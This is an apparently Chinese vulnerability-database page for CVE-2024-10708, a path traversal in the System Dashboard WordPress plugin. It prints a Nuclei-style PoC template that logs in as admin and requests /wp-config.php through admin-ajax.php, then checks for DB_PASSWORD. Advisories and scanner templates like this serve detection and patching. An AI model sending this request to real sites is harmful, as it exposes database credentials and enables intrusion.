CVE-2024-10708: System Dashboard < 2.8.15 - Admin+ Path Traversal

日期: 2025-08-01 | 影响软件: System Dashboard | POC: 已公开

漏洞描述

The System Dashboard WordPress plugin before 2.8.15 does not validate user input used in a path, which could allow high privilege users such as admin to perform path traversal attacks an read arbitrary files on the server

PoC代码[已公开]

id: CVE-2024-10708

info:
  name: System Dashboard < 2.8.15 - Admin+ Path Traversal
  author: 0x_Akoko
  severity: medium
  description: |
    The System Dashboard WordPress plugin before 2.8.15 does not validate user input used in a path, which could allow high privilege users such as admin to perform path traversal attacks an read arbitrary files on the server
  remediation: |
    Fixed in 2.8.15
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10708
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/system-dashboard/system-dashboard-103-local-file-inclusion
    - https://wpscan.com/vulnerability/61d750a5-8c2c-4c94-a1a9-6a254c2a0d03/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2024-10708
    cwe-id: CWE-22
    epss-score: 0.02455
    epss-percentile: 0.84689
    cpe: cpe:2.3:a:bowo:system_dashboard:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: bowo
    product: system_dashboard
    framework: wordpress
    fofa-query: body="/wp-content/plugins/system-dashboard/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,lfi,auth,system-dashboard,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=sd_viewer&filename=/wp-config.php&load_plugins[]=system-dashboard/system-dashboard.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022016e21129b35595ff56dcf91f9908dcd9543323663a18f46849b7adaa7ab0210202204e5925ee013470b8414127b904a662ce5e67fcb7f7d146a0c3d7389a16aefa6f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐